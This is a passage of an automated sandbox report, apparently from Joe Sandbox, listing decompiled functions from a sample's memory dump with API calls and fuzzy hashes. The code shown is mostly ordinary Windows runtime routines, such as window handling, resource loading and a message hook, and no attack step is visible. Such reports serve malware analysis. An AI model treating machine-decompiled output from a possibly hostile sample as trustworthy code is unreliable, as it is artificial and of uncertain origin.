                                  									_t17 = SetWindowPos(E00413D2C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                  									_t35 = _t35 - 1;
                                  								} while (_t35 != 0xffffffff);
                                  							}
                                  						}
                                  					}
                                  					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                  				}
                                  				return _t17;
                                  			}












                                  APIs
                                  • EnumWindows.USER32(00454FCC), ref: 00455071
                                  • GetWindow.USER32(00000003,00000003), ref: 00455089
                                  • GetWindowLongA.USER32 ref: 00455096
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004550D5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  • Opcode ID: 5ec3313145a86c5b264056860e955fc533dec79990326a6888869e60c134bdcb
                                  • Instruction ID: 6e5778e9fa521275c17b7e9b5e8af9e38faca03e042dff6edf411df892f4f507
                                  • Opcode Fuzzy Hash: 5ec3313145a86c5b264056860e955fc533dec79990326a6888869e60c134bdcb
                                  • Instruction Fuzzy Hash: DF115E316046109FDB10EB28C895FA673E4AB44729F15427AFD58AB2D3C378AC44C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E004164E0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) {
                                  				CHAR* _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t18;
                                  				void* _t23;
                                  				CHAR* _t24;
                                  				void* _t25;
                                  				struct HRSRC__* _t29;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t31;
                                  				void* _t32;
                                  
                                  				_v8 = _t24;
                                  				_t31 = __edx;
                                  				_t23 = __eax;
                                  				_t29 = FindResourceA(__edx, _v8, _a8);
                                  				 *(_t23 + 0x10) = _t29;
                                  				if(_t29 == 0) {
                                  					E00416440(_t23, _t24, _t29, _t31, _t32);
                                  					_pop(_t24);
                                  				}
                                  				_t5 = _t23 + 0x10; // 0x41657c
                                  				_t30 = LoadResource(_t31,  *_t5);
                                  				 *(_t23 + 0x14) = _t30;
                                  				if(_t30 == 0) {
                                  					E00416440(_t23, _t24, _t30, _t31, _t32);
                                  				}
                                  				_t7 = _t23 + 0x10; // 0x41657c
                                  				_push(SizeofResource(_t31,  *_t7));
                                  				_t8 = _t23 + 0x14; // 0x416218
                                  				_t18 = LockResource( *_t8);
                                  				_pop(_t25);
                                  				return E004161D8(_t23, _t25, _t18);
                                  			}


















                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 004164F7
                                  • LoadResource.KERNEL32(?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000,?), ref: 00416511
                                  • SizeofResource.KERNEL32(?,0041657C,?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000,?), ref: 0041652B
                                  • LockResource.KERNEL32(00416218,00000000,?,0041657C,?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000), ref: 00416535
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: effc771eec9c3359a5299f979711bfb0c583d7d57c5b227f1da7ba67130cfa55
                                  • Instruction ID: bd0c09abf3e03c4d42031b172baf39923f9370058f279f6758b079423682a0b4
                                  • Opcode Fuzzy Hash: effc771eec9c3359a5299f979711bfb0c583d7d57c5b227f1da7ba67130cfa55
                                  • Instruction Fuzzy Hash: 1AF04B726002046F9744EF9AA881D9B77ECEE88368312006EFD08D7206DA39DD118779
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00408598(WORD* __eax) {
                                  				struct _FILETIME _v16;
                                  				WORD* _t31;
                                  				long _t36;
                                  				void* _t37;
                                  				struct _FILETIME* _t38;
                                  
                                  				_t38 = _t37 + 0xfffffff8;
                                  				_t31 = __eax;
                                  				while((_t31[0xc].dwFileAttributes & _t31[8]) != 0) {
                                  					if(FindNextFileA(_t31[0xa],  &(_t31[0xc])) != 0) {
                                  						continue;
                                  					} else {
                                  						_t36 = GetLastError();
                                  					}
                                  					L5:
                                  					return _t36;
                                  				}
                                  				FileTimeToLocalFileTime( &(_t31[0x16]), _t38);
                                  				FileTimeToDosDateTime( &_v16,  &(_t31[1]), _t31);
                                  				_t31[2] = _t31[0x1c];
                                  				_t31[4] = _t31[0xc].dwFileAttributes;
                                  				E0040438C( &(_t31[6]), 0x104,  &(_t31[0x22]));
                                  				_t36 = 0;
                                  				goto L5;
                                  			}









                                  APIs
                                  • FindNextFileA.KERNEL32(?,?), ref: 004085A9
                                  • GetLastError.KERNEL32(?,?), ref: 004085B2
                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 004085C8
                                  • FileTimeToDosDateTime.KERNEL32 ref: 004085D7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$DateErrorFindLastLocalNext
                                  • String ID:
                                  • API String ID: 2103556486-0
                                  • Opcode ID: e3039e5cb61183d64ee860cb5a8373964d7b685bcf0ba32209ffd6352513d08c
                                  • Instruction ID: 3e63325add3c55498705f99be63b8988188adc079c016c58041bd934e135173b
                                  • Opcode Fuzzy Hash: e3039e5cb61183d64ee860cb5a8373964d7b685bcf0ba32209ffd6352513d08c
                                  • Instruction Fuzzy Hash: 0C01FFB6600210AFCB04DFA8C9C188773ECAB4836471545BBFD46DF28BE638D95487B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004327E8(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t9;
                                  				signed int _t16;
                                  				struct HWND__* _t19;
                                  				DWORD* _t20;
                                  
                                  				_t17 = __ecx;
                                  				_push(__ecx);
                                  				_t19 = __eax;
                                  				_t16 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                  					_t9 =  *0x470ab0; // 0x0
                                  					if(GlobalFindAtomA(E004045DC(_t9)) !=  *0x470aac) {
                                  						_t16 = 0 | E00431870(_t19, _t17) != 0x00000000;
                                  					} else {
                                  						_t16 = 0 | GetPropA(_t19,  *0x470aac & 0x0000ffff) != 0x00000000;
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 004327F5
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00432860,00432628,52FF108B,00000000,0043241A,?,-00000010,?), ref: 004327FE
                                  • GlobalFindAtomA.KERNEL32 ref: 00432813
                                  • GetPropA.USER32 ref: 0043282A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: ce64668a4fe9bf5b9cab420989a359330f643eb952969cda96e326aff2303cd0
                                  • Instruction ID: d4baa464cd4f2ed18d37aed5e126c9cfef399abef2086ccac46b60058e8cb31d
                                  • Opcode Fuzzy Hash: ce64668a4fe9bf5b9cab420989a359330f643eb952969cda96e326aff2303cd0
                                  • Instruction Fuzzy Hash: 36F0207260AA226BD62177764E4186F21CC9E24318F10813BFC40D22A6DB2CCC9281BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004318A4(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t5;
                                  				struct HWND__* _t12;
                                  				void* _t15;
                                  				DWORD* _t16;
                                  
                                  				_t13 = __ecx;
                                  				_push(__ecx);
                                  				_t12 = __eax;
                                  				_t15 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                  					_t5 =  *0x470ab4; // 0x0
                                  					if(GlobalFindAtomA(E004045DC(_t5)) !=  *0x470aae) {
                                  						_t15 = E00431870(_t12, _t13);
                                  					} else {
                                  						_t15 = GetPropA(_t12,  *0x470aae & 0x0000ffff);
                                  					}
                                  				}
                                  				return _t15;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 004318B1
                                  • GetCurrentProcessId.KERNEL32(?,0046D588,00000000,00457BE5,?,?,0046D588,00000001,004561E4,?,00000000,00000000,00000000,00000001), ref: 004318BA
                                  • GlobalFindAtomA.KERNEL32 ref: 004318CF
                                  • GetPropA.USER32 ref: 004318E6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: 67064ea43f90be55d9888ad63b4c50a935d3a828f17850ecb6032a26817ddd44
                                  • Instruction ID: 16a02b4edb54ed26c6b7321964109a7b4619efb432fc04768045c23baaff89f4
                                  • Opcode Fuzzy Hash: 67064ea43f90be55d9888ad63b4c50a935d3a828f17850ecb6032a26817ddd44
                                  • Instruction Fuzzy Hash: C2F06CA170531156D724B7BA6C8182B16CCD91A3E9B01183BB945E71A2D53CCC91837D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045482C(void* __ecx) {
                                  				void* _t2;
                                  				DWORD* _t7;
                                  
                                  				_t2 =  *0x470b40; // 0x0
                                  				if( *((char*)(_t2 + 0xad)) == 0) {
                                  					if( *0x470b58 == 0) {
                                  						_t2 = SetWindowsHookExA(3, E004547E8, 0, GetCurrentThreadId());
                                  						 *0x470b58 = _t2;
                                  					}
                                  					if( *0x470b54 == 0) {
                                  						_t2 = CreateEventA(0, 0, 0, 0);
                                  						 *0x470b54 = _t2;
                                  					}
                                  					if( *0x470b5c == 0) {
                                  						_t2 = CreateThread(0, 0x3e8, E0045478C, 0, 0, _t7);
                                  						 *0x470b5c = _t2;
                                  					}
                                  				}
                                  				return _t2;
                                  			}






                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00454844
                                  • SetWindowsHookExA.USER32 ref: 00454854
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045785A), ref: 0045486F
                                  • CreateThread.KERNEL32(00000000,000003E8,0045478C,00000000,00000000), ref: 00454893
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 8cf5178579fc43657cbec4a271b8a2ac04aedb8654193e9b74272b57baf4d48c
                                  • Instruction ID: 23923bf5454ec496cc62a370bf888c93aba378d183ff87e74dc9f3d84d0597b6
                                  • Opcode Fuzzy Hash: 8cf5178579fc43657cbec4a271b8a2ac04aedb8654193e9b74272b57baf4d48c
                                  • Instruction Fuzzy Hash: BEF03074682380BEF71067A19C06F2636949351B1EF11007BF5097F1D2C3B965C88A5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00459324(signed int __eax) {
                                  				signed int _t1;
                                  				signed int _t2;
                                  
                                  				_t1 = __eax;
                                  				_push(0);
                                  				L004066E4();
                                  				_t2 = __eax;
                                  				_push(0xc);
                                  				_push(__eax);
                                  				L0040641C();
                                  				_push(0xe);
                                  				_push(__eax);
                                  				L0040641C();
                                  				if(__eax * __eax > 8) {
                                  					 *0x46f05f = 0;
                                  				} else {
                                  					 *0x46f05f = 1;
                                  				}
                                  				_push(_t2);
                                  				_push(0);
                                  				L00406944();
                                  				return _t1;
                                  			}






                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 00459328
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 00459332
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 0045933C
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 0045935C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: e50913134c09b3162230df70f966bd8cdfb9f6e0f9086267f4a712ba9af7f4ef
                                  • Instruction ID: 6e2f045cb5ca97dadcbe135a89dac665ada7a80bb880bc728cb1a6d01e7b84f3
                                  • Opcode Fuzzy Hash: e50913134c09b3162230df70f966bd8cdfb9f6e0f9086267f4a712ba9af7f4ef
                                  • Instruction Fuzzy Hash: 9AE012916442E4E8F26033766DC7F6A0A8C8B0575AF0A0477FE467E1C3D4ED4C68467E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406A8C(void* __eax, int __ecx, long __edx) {
                                  				void* _t2;
                                  				void* _t4;
                                  
                                  				_t2 = GlobalHandle(__eax);
                                  				GlobalUnWire(_t2);
                                  				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                  				GlobalFix(_t4);
                                  				return _t4;
                                  			}






                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: 988c9263a3d7fa4446e6752a6436000b074c09a49b2dd22cc2c6a0658e6c25d7
                                  • Instruction ID: 9c07ab404b808133c060a1af8f80c56271c62a36c77e1d8065355d1264372c18
                                  • Opcode Fuzzy Hash: 988c9263a3d7fa4446e6752a6436000b074c09a49b2dd22cc2c6a0658e6c25d7
                                  • Instruction Fuzzy Hash: 6FB002C49112013DEC5477B25C0BD7F055C9D9570C3824AEE7806B3083997D98210479
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0046CA30(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				signed char _v25;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				int _t54;
                                  				char* _t56;
                                  				int _t58;
                                  				intOrPtr* _t77;
                                  				void* _t85;
                                  				intOrPtr _t87;
                                  				void* _t91;
                                  				intOrPtr _t94;
                                  				intOrPtr* _t113;
                                  				void* _t114;
                                  				intOrPtr _t124;
                                  				char _t142;
                                  				intOrPtr _t144;
                                  				intOrPtr _t145;
                                  
                                  				_t140 = __edi;
                                  				_t144 = _t145;
                                  				_t114 = 7;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t114 = _t114 - 1;
                                  				} while (_t114 != 0);
                                  				_push(_t114);
                                  				_t142 = __edx;
                                  				_t113 = __eax;
                                  				_push(_t144);
                                  				_push(0x46cc04);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t145;
                                  				_t115 =  *__eax;
                                  				 *((intOrPtr*)( *__eax + 0x120))();
                                  				E0040C4B8(_v16, _t115,  &_v20);
                                  				E0040C4B8(_t142, _t115,  &_v24);
                                  				_t54 = E004043DC(_v24);
                                  				_t56 = E004045DC(_v24);
                                  				_t58 = E004043DC(_v20);
                                  				if(CompareStringA(0x400, 0, E004045DC(_v20), _t58, _t56, _t54) == 2 || E004043DC(_t142) == 0) {
                                  					L17:
                                  					_pop(_t124);
                                  					 *[fs:eax] = _t124;
                                  					_push(0x46cc0b);
                                  					E0040411C( &_v64);
                                  					E0040411C( &_v52);
                                  					E0040411C( &_v32);
                                  					return E00404140( &_v24, 5);
                                  				} else {
                                  					_t118 =  &_v8;
                                  					E0046BBC8(_t142, _t113,  &_v8,  &_v25, __edi, _t142,  &_v12);
                                  					_t77 =  *((intOrPtr*)(_t113 + 0x2a8));
                                  					if(_t77 == 0) {
                                  						__eflags = _v25;
                                  						if(_v25 == 0) {
                                  							E0046C898(_t113, _t113,  &_v8, _v8, _t142);
                                  						} else {
                                  							_v48 = _v25 & 0x000000ff;
                                  							_v44 = 2;
                                  							_v40 = _v8;
                                  							_v36 = 0xb;
                                  							_t118 = 1;
                                  							E00408F74(0x46cc1c, 1,  &_v48,  &_v32);
                                  							E0046C898(_t113, _t113, 1, _v32, _t142);
                                  						}
                                  					} else {
                                  						_t118 =  *_t77;
                                  						 *((intOrPtr*)( *_t77 + 0x114))();
                                  					}
                                  					if(E00404720(0x46cc2c, _v12) > 0) {
                                  						L11:
                                  						E0046C9A8(_t113, _v12, _t151);
                                  						goto L17;
                                  					}
                                  					_t85 = E00404720(0x46cc38, _v12);
                                  					_t151 = _t85;
                                  					if(_t85 <= 0) {
                                  						_t87 = E004043DC(_v12);
                                  						__eflags = _t87;
                                  						if(_t87 > 0) {
                                  							E0046C5F4(_t113, _t113, _t118, _v12, _t142);
                                  							_t91 = E0040850C(_v12);
                                  							__eflags = _t91 + 1;
                                  							if(_t91 + 1 == 0) {
                                  								_v60 = _t142;
                                  								_v56 = 0xb;
                                  								_t94 =  *0x46fd20; // 0x410948
                                  								E00405C70(_t94,  &_v64);
                                  								E0040B86C(_t113, _v64, 1, _t140, _t142, 0,  &_v60);
                                  								E00403B64();
                                  							} else {
                                  								E0046C5A4(_t113,  &_v52);
                                  								__eflags = _v52;
                                  								if(__eflags == 0) {
                                  									E0046C9A8(_t113, _v12, __eflags);
                                  									E0046C5F4(_t113, _t113, _t118, _v12, _t142);
                                  								}
                                  							}
                                  						}
                                  						goto L17;
                                  					}
                                  					goto L11;
                                  				}
                                  			}

































                                  APIs
                                  • CompareStringA.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,?,?,00000006,00000000,00000000), ref: 0046CAA1
                                    • Part of subcall function 0046C898: CompareStringA.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,00000000,0046C96C,?,?,?,00000000,00000000,00000000), ref: 0046C903
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: String$Compare$Load
                                  • String ID: %s:%s$HA
                                  • API String ID: 2066347653-1752211433
                                  • Opcode ID: 51c50ebdc3c37ae6a9cd4d440bf09c5631faeaa82b00890fd4f01f5973f2bd56
                                  • Instruction ID: 9a01df2e92f6cf8c7730ba442fa4e04aa62ca30b316586a33a06b1684af1fe0c
                                  • Opcode Fuzzy Hash: 51c50ebdc3c37ae6a9cd4d440bf09c5631faeaa82b00890fd4f01f5973f2bd56
                                  • Instruction Fuzzy Hash: 25512370A001099BDB00EBA5DC82AAEB7B5AF44704F50457BF941F7392EB7CAD05CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00409E14(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				short _v18;
                                  				short _v22;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v280;
                                  				char* _t32;
                                  				intOrPtr* _t49;
                                  				intOrPtr _t58;
                                  				void* _t63;
                                  				void* _t67;
                                  
                                  				_v8 = 0;
                                  				_t49 = __edx;
                                  				_t63 = __eax;
                                  				_push(_t67);
                                  				_push(0x409ef2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t67 + 0xfffffeec;
                                  				E0040411C(__edx);
                                  				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
                                  				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
                                  				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
                                  				if(_t63 > 2) {
                                  					E004041B4( &_v8, 0x409f14);
                                  				} else {
                                  					E004041B4( &_v8, 0x409f08);
                                  				}
                                  				_t32 = E004045DC(_v8);
                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                  					E0040438C(_t49, 0x100,  &_v280);
                                  					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                  						E0040463C( *_t49, E004043DC( *_t49) - 1, 2, _t49);
                                  					}
                                  				}
                                  				_pop(_t58);
                                  				 *[fs:eax] = _t58;
                                  				_push(E00409EF9);
                                  				return E0040411C( &_v8);
                                  			}














                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409EF2), ref: 00409E9A
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409EF2), ref: 00409EA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040EEB4(signed short* __eax, void* __ecx, signed short* __edx) {
                                  				intOrPtr* _v16;
                                  				void* _t15;
                                  				signed short* _t23;
                                  				signed short _t34;
                                  				signed short* _t35;
                                  				void* _t36;
                                  
                                  				_t12 = __eax;
                                  				_push(__ecx);
                                  				_t35 = __edx;
                                  				_t23 = __eax;
                                  				if(( *__eax & 0x0000bfe8) != 0) {
                                  					_t12 = E0040EBBC(__eax, __ecx);
                                  				}
                                  				_t34 =  *_t35 & 0x0000ffff;
                                  				if(_t34 >= 0x14) {
                                  					if(_t34 != 0x100) {
                                  						if(_t34 != 0x101) {
                                  							if((_t34 & 0x00002000) == 0) {
                                  								if(E00410618(_t34, _t36) == 0) {
                                  									_push(_t35);
                                  									_push(_t23);
                                  									L0040D6BC();
                                  									_t15 = E0040E90C(_t14);
                                  								} else {
                                  									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
                                  								}
                                  							} else {
                                  								_t15 = E0040ECE0(_t23, 0x40eeac, _t35);
                                  							}
                                  						} else {
                                  							 *_t23 = _t34;
                                  							_t23[4] = _t35[4];
                                  							_t15 =  *0x47081c();
                                  						}
                                  					} else {
                                  						 *_t23 = 0x100;
                                  						_t23[4] = 0;
                                  						_t15 = E00404170( &(_t23[4]), _t35[4]);
                                  					}
                                  				} else {
                                  					_push(_t35);
                                  					_push(_t23);
                                  					L0040D6BC();
                                  					_t15 = E0040E90C(_t12);
                                  				}
                                  				return _t15;
                                  			}










                                  APIs
                                  • VariantCopy.OLEAUT32(?), ref: 0040EED5
                                    • Part of subcall function 0040EBBC: VariantClear.OLEAUT32 ref: 0040EBCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCopy
                                  • String ID: t@
                                  • API String ID: 274517740-2916730932
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00434F44(void* __eflags, intOrPtr _a4) {
                                  				signed char _v5;
                                  				struct tagRECT _v21;
                                  				struct tagRECT _v40;
                                  				void* _t40;
                                  				void* _t45;
                                  
                                  				_v5 = 1;
                                  				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1a0));
                                  				_t45 = E00413D88( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1a0)),  *((intOrPtr*)(_a4 - 4)));
                                  				if(_t45 <= 0) {
                                  					L5:
                                  					_v5 = 0;
                                  				} else {
                                  					do {
                                  						_t45 = _t45 - 1;
                                  						_t40 = E00413D2C(_t44, _t45);
                                  						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                  							goto L4;
                                  						} else {
                                  							E0043452C(_t40,  &_v40);
                                  							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                  							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                  								goto L4;
                                  							}
                                  						}
                                  						goto L6;
                                  						L4:
                                  					} while (_t45 > 0);
                                  					goto L5;
                                  				}
                                  				L6:
                                  				return _v5 & 0x000000ff;
                                  			}









                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

